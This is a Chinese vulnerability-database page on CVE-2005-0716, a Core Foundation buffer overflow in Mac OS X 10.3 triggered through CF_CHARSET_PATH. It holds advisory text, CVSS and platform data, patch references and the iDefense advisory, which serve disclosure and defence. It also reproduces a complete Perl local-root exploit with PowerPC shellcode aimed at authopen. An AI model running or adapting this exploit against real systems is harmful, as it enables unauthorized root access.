CVE-2005-0716
CVSS7.2
发布时间 :2005-03-21 00:00:00
修订时间 :2008-09-05 16:47:06
NMCOEPS    

[原文]Stack-based buffer overflow in the Core Foundation Library in Mac OS X 10.3.5 and 10.3.6, and possibly earlier versions, allows local users to execute arbitrary code via a long CF_CHARSET_PATH environment variable.


[CNNVD]Mac OS X CF_CHARSET_PATH环境变量处理缓冲区溢出漏洞(CNNVD-200503-124)

        Mac OS X是苹果家族的操作系统。
        Mac OS X中默认捆绑的Core Foundation程序库中存在缓冲区溢出漏洞,可能允许攻击者获取root用户权限。
        漏洞的起因是由于没有正确的处理CF_CHARSET_PATH环境变量。如果通过这个变量传送了大于1024个字符的字符串的话,就可能导致栈溢出,允许攻击者通过在栈中覆盖函数的返回地址来控制程序流。
        任何链接到Core Foundation函数库上的应用程序都可用作这个漏洞的攻击载体。一些有漏洞的setuid root二进制程序包括su,pppd和login等。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:apple:mac_os_x:10.3.1Apple Mac OS X 10.3.1
cpe:/o:apple:mac_os_x_server:10.3.3Apple Mac OS X Server 10.3.3
cpe:/o:apple:mac_os_x_server:10.3.4Apple Mac OS X Server 10.3.4
cpe:/o:apple:mac_os_x:10.3.6Apple Mac OS X 10.3.6
cpe:/o:apple:mac_os_x:10.3.2Apple Mac OS X 10.3.2
cpe:/o:apple:mac_os_x_server:10.3.5Apple Mac OS X Server 10.3.5
cpe:/o:apple:mac_os_x:10.3.8Apple Mac OS X 10.3.8
cpe:/o:apple:mac_os_x_server:10.3.1Apple Mac OS X Server 10.3.1
cpe:/o:apple:mac_os_x:10.3.4Apple Mac OS X 10.3.4
cpe:/o:apple:mac_os_x_server:10.3.2Apple Mac OS X Server 10.3.2
cpe:/o:apple:mac_os_x:10.3.3Apple Mac OS X 10.3.3
cpe:/o:apple:mac_os_x_server:10.3Apple Mac OS X Server 10.3
cpe:/o:apple:mac_os_x:10.3.7Apple Mac OS X 10.3.7
cpe:/o:apple:mac_os_x:10.3.5Apple Mac OS X 10.3.5
cpe:/o:apple:mac_os_x:10.3Apple Mac OS X 10.3
cpe:/o:apple:mac_os_x_server:10.3.6Apple Mac OS X Server 10.3.6

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0716
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0716
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200503-124
(官方数据源) CNNVD

- 其它链接及资源

http://www.idefense.com/application/poi/display?id=219&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050321 Mac OS X CF_CHARSET_PATH Buffer Overflow Vulnerability
http://lists.apple.com/archives/security-announce/2005/Mar/msg00000.html
(VENDOR_ADVISORY)  APPLE  APPLE-SA-2005-03-21
http://www.securityfocus.com/bid/13224
(UNKNOWN)  BID  13224

- 漏洞信息

Mac OS X CF_CHARSET_PATH环境变量处理缓冲区溢出漏洞
高危 缓冲区溢出
2005-03-21 00:00:00 2005-10-20 00:00:00
远程※本地  
        Mac OS X是苹果家族的操作系统。
        Mac OS X中默认捆绑的Core Foundation程序库中存在缓冲区溢出漏洞,可能允许攻击者获取root用户权限。
        漏洞的起因是由于没有正确的处理CF_CHARSET_PATH环境变量。如果通过这个变量传送了大于1024个字符的字符串的话,就可能导致栈溢出,允许攻击者通过在栈中覆盖函数的返回地址来控制程序流。
        任何链接到Core Foundation函数库上的应用程序都可用作这个漏洞的攻击载体。一些有漏洞的setuid root二进制程序包括su,pppd和login等。
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://docs.info.apple.com/article.html?artnum=301061

- 漏洞信息 (2111)

Mac OS X <= 10.3.8 (CF_CHARSET_PATH) Local BOF Exploit (2) (EDBID:2111)
osX local
2006-08-02 Verified
0 Kevin Finisterre
N/A [点击下载]
#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# Variant of CF_CHARSET_PATH a local root exploit by v9_at_fakehalo.us
#
# I was in the mood for some retro shit this morning, and I need root on some old ass G3 iMacs for a demo.
#
# I got sick of pressing enter on v9's exploit. It gets in the way when scripting attacks.
#
# Jill-Does-Computer:/tmp jilldoe$ ./authopen-CF_CHARSET.pl 0
# *** Target: 10.3.7 Build 7T65 on PowerPC, Padding: 1
# sh-2.05b# id
# uid=502(jilldoe) euid=0(root) gid=502(jilldoe) groups=502(jilldoe), 79(appserverusr), 80(admin), 81(appserveradm)
#
#

foreach $key (keys %ENV) {

   delete $ENV{$key};

}

#// ppc execve() code by b-r00t + nemo to add seteuid(0)
$sc =
"\x7c\x63\x1a\x79" .
"\x40\x82\xff\xfd" .
"\x39\x40\x01\xc3" .
"\x38\x0a\xfe\xf4" .
"\x44\xff\xff\x02" .
"\x39\x40\x01\x23" .
"\x38\x0a\xfe\xf4" .
"\x44\xff\xff\x02" .
"\x60\x60\x60\x60" .
"\x7c\xa5\x2a\x79" .
"\x40\x82\xff\xfd" .
"\x7d\x68\x02\xa6" .
"\x3b\xeb\x01\x70" .
"\x39\x40\x01\x70\x39\x1f\xfe\xcf" .
"\x7c\xa8\x29\xae\x38\x7f\xfe\xc8" .
"\x90\x61\xff\xf8\x90\xa1\xff\xfc" .
"\x38\x81\xff\xf8\x38\x0a\xfe\xcb" .
"\x44\xff\xff\x02\x7c\xa3\x2b\x78" .
"\x38\x0a\xfe\x91\x44\xff\xff\x02" .
"\x2f\x62\x69\x6e\x2f\x73\x68\x58";

$tgts{"0"} = "10.3.7 Build 7T65 on PowerPC:1";
$tgts{"1"} = "10.3.7 debug 0x41424344:0";

unless (($target) = @ARGV) {

       print "\n\nUsage: $0 <target> \n\nTargets:\n\n";

       foreach $key (sort(keys %tgts)) {
               ($a,$b) = split(/\:/,$tgts{"$key"});
               print "\t$key . $a\n";
       }

       print "\n";
       exit 1;
}

$ret = pack("l", ($retval));
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a, Padding: $b\n";

# add a wrapper here if you want more than euid=0
open(SUSH,">/tmp/sh");
printf SUSH "/bin/csh -i\n";

$ENV{"CF_CHARSET_PATH"} = "A" x 1048 . pack('l', 0xbffffef6) x 2;

$ENV{"APPL"} = "." x $b . "iiii" x 40 . $sc ;

system("/usr/libexec/authopen /etc/master.passwd");

# milw0rm.com [2006-08-02]
		

- 漏洞信息 (F36760)

xosx-cf.c (PacketStormID:F36760)
2005-03-24 00:00:00
vade79  fakehalo.us
exploit,overflow,local,root
apple,osx
CVE-2005-0716
[点击下载]

Local root exploit for /usr/bin/su on Mac OS X that makes use of the buffer overflow vulnerability discovered by iDefense using the CF_CHARSET_PATH environment variable.

- 漏洞信息 (F36748)

iDEFENSE Security Advisory 2005-03-21.t (PacketStormID:F36748)
2005-03-22 00:00:00
iDefense Labs  idefense.com
advisory,overflow,local,root
apple,osx
CVE-2005-0716
[点击下载]

iDEFENSE Security Advisory 03.21.05 - Local exploitation of a buffer overflow vulnerability within the Core Foundation Library included by default in Apple Computer Inc.'s Mac OS X could allow an attacker to gain root privileges. iDEFENSE has confirmed this vulnerability in Mac OS X 10.3.5 and Mac OS X 10.3.6. Earlier versions are suspected vulnerable.

Mac OS X CF_CHARSET_PATH Buffer Overflow Vulnerability

iDEFENSE Security Advisory 03.21.05
www.idefense.com/application/poi/display?id=219&type=vulnerabilities
March 21, 2005

I. BACKGROUND

Mac OS X is an operating system for the Apple family of microcomputers.

More information is available at the following link:
http://www.apple.com/macosx/

II. DESCRIPTION

Local exploitation of a buffer overflow vulnerability within the Core 
Foundation Library included by default in Apple Computer Inc.'s Mac OS X

could allow an attacker to gain root privileges.

The vulnerability specifically exists due to improper handling of the 
CF_CHARSET_PATH environment variable. When a string greater than 1,024 
characters is passed via this variable, a stack-based overflow occurs, 
allowing the attacker to control program flow by overwriting the 
function's return address on the stack. 

Any application linked against the Core Foundation Library can be used 
as an exploit vector for this vulnerability. Some of the setuid root 
binaries that are vulnerable include su, pppd and login.

III. ANALYSIS

Successful exploitation of this vulnerability allows for root access. An

attacker needs local access to the victim's system to exploit this 
vulnerability. This vulnerability is difficult to workaround due to the 
fact that a large number of system binaries are linked against the 
vulnerable code.

IV. DETECTION

iDEFENSE has confirmed this vulnerability in Mac OS X 10.3.5 and Mac OS 
X 10.3.6. Earlier versions are suspected vulnerable.

V. WORKAROUND

Restrict local access to trusted users only, as it is impossible to 
remove the setuid bit from the affected binaries without severely 
limiting the function of the system.

VI. VENDOR RESPONSE

This vulnerability is addressed in Apple Security Update 2005-003
available at:

   http://docs.info.apple.com/article.html?artnum=301061

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-0716 to this issue. This is a candidate for inclusion
in the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

02/04/2005  Initial vendor notification
02/04/2005  Initial vendor response
03/21/2005  Coordinated public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
    

- 漏洞信息

15006
Apple Mac OS X AFP Core Foundation Library CF_CHARSET_PATH Variable Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

A local overflow exists in Mac OS X. The Core Foundation Library fails to validate the CF_CHARSET_PATH environment variable resulting in a buffer overflow. With a specially crafted request greater than 1024 characters, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2005-03-21 2005-02-04
2005-03-21 2005-03-28

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Apple has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Apple Mac OS X Core Foundation Local Buffer Overflow Vulnerability
Boundary Condition Error 13224
No Yes
2005-03-22 12:00:00 2006-08-02 11:16:00
Discovery is credited to Adriano Lima of SeedSecurity.com and an anonymous source.

- 受影响的程序版本

Apple Mac OS X Server 10.3.8
Apple Mac OS X Server 10.3.7
Apple Mac OS X Server 10.3.6
Apple Mac OS X Server 10.3.5
Apple Mac OS X Server 10.3.4
Apple Mac OS X Server 10.3.3
Apple Mac OS X Server 10.3.2
Apple Mac OS X Server 10.3.1
Apple Mac OS X Server 10.3
Apple Mac OS X 10.3.8
Apple Mac OS X 10.3.7
Apple Mac OS X 10.3.6
Apple Mac OS X 10.3.5
Apple Mac OS X 10.3.4
Apple Mac OS X 10.3.3
Apple Mac OS X 10.3.2
Apple Mac OS X 10.3.1
Apple Mac OS X 10.3

- 漏洞讨论

Mac OS X is prone to a local buffer overflow in Core Foundation. Successful exploitation could result in arbitrary code execution with elevated privileges.

- 漏洞利用

The following exploits are available:

- 解决方案

Apple has released an advisory (APPLE-SA-2005-03-21) and fixes to address this issue.


Apple Mac OS X Server 10.3.8

Apple Mac OS X 10.3.8

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站